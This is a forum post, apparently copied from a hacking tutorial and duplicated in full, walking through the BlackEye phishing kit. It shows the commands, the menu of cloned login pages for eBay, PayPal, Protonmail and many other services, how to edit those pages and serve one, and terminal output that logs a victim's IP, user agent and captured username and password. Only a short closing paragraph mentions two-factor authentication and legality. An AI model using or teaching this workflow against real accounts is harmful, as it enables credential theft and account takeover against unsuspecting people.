- Joined
- May 27, 2016
- Messages
- 2,787
- Likes
- 811
- Points
- 723
Step 1 Download & Test BlackEye
First, we'll need to clone the source from BlackEye's GitHub repository. To do that, open a new terminal window and type the following git and cd commands.
~$ git clone https://github.com/thelinuxchoice/blackeye
Cloning into 'blackeye'...
remote: Enumerating objects: 361, done.
remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361
Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB/s, done.
Resolving deltas: 100% (101/101), done.
~$ cd blackeye
~/blackeye$
That should install the BlackEye repository and enable it to run it from the blackeye folder with the bash blackeye.sh command. When we run the command, we should see the splash screen below.
~/blackeye$ bash blackeye.sh
:: Disclaimer: Developers assume no liability and are not ::
:: responsible for any misuse or damage caused by BlackEye. ::
:: Only use for educational purporses!! ::
:: Attacking targets without mutual consent is illegal! ::
[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] Wordpress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART CODED BY: @thelinuxchoice
UPGRADED BY: @suljot_gjoka
Step 2 Adjust Phishing Websites
If we don't like something like an expired copyright notice, we can change it pretty easily. First, exit out of the bash script back into the blackeye folder. Then, we'll type ls to see the sites folder within the BlackEye repo.
~/blackeye$ ls
blackeye.sh LICENSE README.md sites
We can navigate to it using the cd sites command. Then, type ls to see all of the phishing site templates available to modify.
~/blackeye$ cd sites
~/blackeye/sites$ ls
adobe cryptocurrency facebook google linkedin myspace paypal shopify spotify twitter wordpress
badoo devianart github instafollowers messenger netflix pinterest shopping steam verizon yahoo
create dropbox gitlab instagram microsoft origin protonmail snapchat twitch vk yandex
To edit Protonmail, we can type cd protonmail and then ls again to see the files in that folder. You should see something like the files below.
~/blackeye/sites$ cd protonmail
~/blackeye/sites/protonmail$ ls
index_files index.php ip.php ip.txt login.html login.php saved.ip.txt saved.usernames.txt
To edit the HTML of the phishing page, you can do so directly by opening login.html with a text editor, allowing you to easily update any copyright notices or other details.
Step 3 Serve Up the Phishing Page
To start our phishing page, open a terminal window and navigate to the blackeye folder again. Then, run the bash blackeye.sh command to get back to the phishing page selection menu. Here, we'll select eBay, which is number 18.
~/blackeye/sites/protonmail$ cd
~$ cd blackeye
~/blackeye$ bash blackeye.sh
[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] Wordpress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART
[*] Choose an option: 18
After entering the number of the site you wish to create, press enter. Next, we'll be asked to supply our IP address. If you press enter without adding one, it will try to add yours by default, but it doesn't always work. After supplying your IP address, you should see something like the prompt below.
[*] Put your local IP (Default 10.0.6.27):
[*] Starting php server...
[*] Send this link to the Victim: 192.168.0.16
[*] Waiting victim open the link ...
Next, navigate to the phishing link in a browser to see the result of your phishing site.
Step 4 Capture a Password
When you open the site in a browser, it should look something like this:
Opening the link causes the script to report back on the type of devices currently accessing the phishing page.
[*] Waiting victim open the link ...
[*] IP Found!
[*] Victim IP: 192.168.43.142
[*] User-Agent: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
[*] Saved: shopping/saved.ip.txt
Once the target enters their credentials, they're redirected to the real eBay page, creating the illusion of a successful login.
On the hacker's side, BlackEye provides us with the credentials our target just entered.
[*] Waiting credentials ...
[*] Credentials Found!
[*] Account: fudruckers
[*] Password: thefudruckerking69
[*] Saved: sites/shopping/saved.usernames.txt
Just like that, we've intercepted and saved the credentials a target entered into our phishing page!
Phishing Social Media Sites Is Fast & Easy
When it comes to stopping attacks like this, two-factor authentication is the average user's best friend. Without it, a single mistake can lead to your password being stolen and used to access your account by an attacker. So set up 2FA on Facebook, Instagram, and whatever other accounts you have.
Another step towards improving security is to use a hardware security key to require new devices to use your key to log in, rendering stolen passwords and even intercepted text messages useless. Keep in mind that while BlackEye makes phishing easy, it doesn't make it legal to steal passwords for accounts that you don't have permission to access.
First, we'll need to clone the source from BlackEye's GitHub repository. To do that, open a new terminal window and type the following git and cd commands.
~$ git clone https://github.com/thelinuxchoice/blackeye
Cloning into 'blackeye'...
remote: Enumerating objects: 361, done.
remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361
Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB/s, done.
Resolving deltas: 100% (101/101), done.
~$ cd blackeye
~/blackeye$
That should install the BlackEye repository and enable it to run it from the blackeye folder with the bash blackeye.sh command. When we run the command, we should see the splash screen below.
~/blackeye$ bash blackeye.sh
:: Disclaimer: Developers assume no liability and are not ::
:: responsible for any misuse or damage caused by BlackEye. ::
:: Only use for educational purporses!! ::
:: Attacking targets without mutual consent is illegal! ::
[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] Wordpress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART CODED BY: @thelinuxchoice
UPGRADED BY: @suljot_gjoka
Step 2 Adjust Phishing Websites
If we don't like something like an expired copyright notice, we can change it pretty easily. First, exit out of the bash script back into the blackeye folder. Then, we'll type ls to see the sites folder within the BlackEye repo.
~/blackeye$ ls
blackeye.sh LICENSE README.md sites
We can navigate to it using the cd sites command. Then, type ls to see all of the phishing site templates available to modify.
~/blackeye$ cd sites
~/blackeye/sites$ ls
adobe cryptocurrency facebook google linkedin myspace paypal shopify spotify twitter wordpress
badoo devianart github instafollowers messenger netflix pinterest shopping steam verizon yahoo
create dropbox gitlab instagram microsoft origin protonmail snapchat twitch vk yandex
To edit Protonmail, we can type cd protonmail and then ls again to see the files in that folder. You should see something like the files below.
~/blackeye/sites$ cd protonmail
~/blackeye/sites/protonmail$ ls
index_files index.php ip.php ip.txt login.html login.php saved.ip.txt saved.usernames.txt
To edit the HTML of the phishing page, you can do so directly by opening login.html with a text editor, allowing you to easily update any copyright notices or other details.
Step 3 Serve Up the Phishing Page
To start our phishing page, open a terminal window and navigate to the blackeye folder again. Then, run the bash blackeye.sh command to get back to the phishing page selection menu. Here, we'll select eBay, which is number 18.
~/blackeye/sites/protonmail$ cd
~$ cd blackeye
~/blackeye$ bash blackeye.sh
[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] Wordpress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART
[*] Choose an option: 18
After entering the number of the site you wish to create, press enter. Next, we'll be asked to supply our IP address. If you press enter without adding one, it will try to add yours by default, but it doesn't always work. After supplying your IP address, you should see something like the prompt below.
[*] Put your local IP (Default 10.0.6.27):
[*] Starting php server...
[*] Send this link to the Victim: 192.168.0.16
[*] Waiting victim open the link ...
Next, navigate to the phishing link in a browser to see the result of your phishing site.
Step 4 Capture a Password
When you open the site in a browser, it should look something like this:
Opening the link causes the script to report back on the type of devices currently accessing the phishing page.
[*] Waiting victim open the link ...
[*] IP Found!
[*] Victim IP: 192.168.43.142
[*] User-Agent: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
[*] Saved: shopping/saved.ip.txt
Once the target enters their credentials, they're redirected to the real eBay page, creating the illusion of a successful login.
On the hacker's side, BlackEye provides us with the credentials our target just entered.
[*] Waiting credentials ...
[*] Credentials Found!
[*] Account: fudruckers
[*] Password: thefudruckerking69
[*] Saved: sites/shopping/saved.usernames.txt
Just like that, we've intercepted and saved the credentials a target entered into our phishing page!
Phishing Social Media Sites Is Fast & Easy
When it comes to stopping attacks like this, two-factor authentication is the average user's best friend. Without it, a single mistake can lead to your password being stolen and used to access your account by an attacker. So set up 2FA on Facebook, Instagram, and whatever other accounts you have.
Another step towards improving security is to use a hardware security key to require new devices to use your key to log in, rendering stolen passwords and even intercepted text messages useless. Keep in mind that while BlackEye makes phishing easy, it doesn't make it legal to steal passwords for accounts that you don't have permission to access.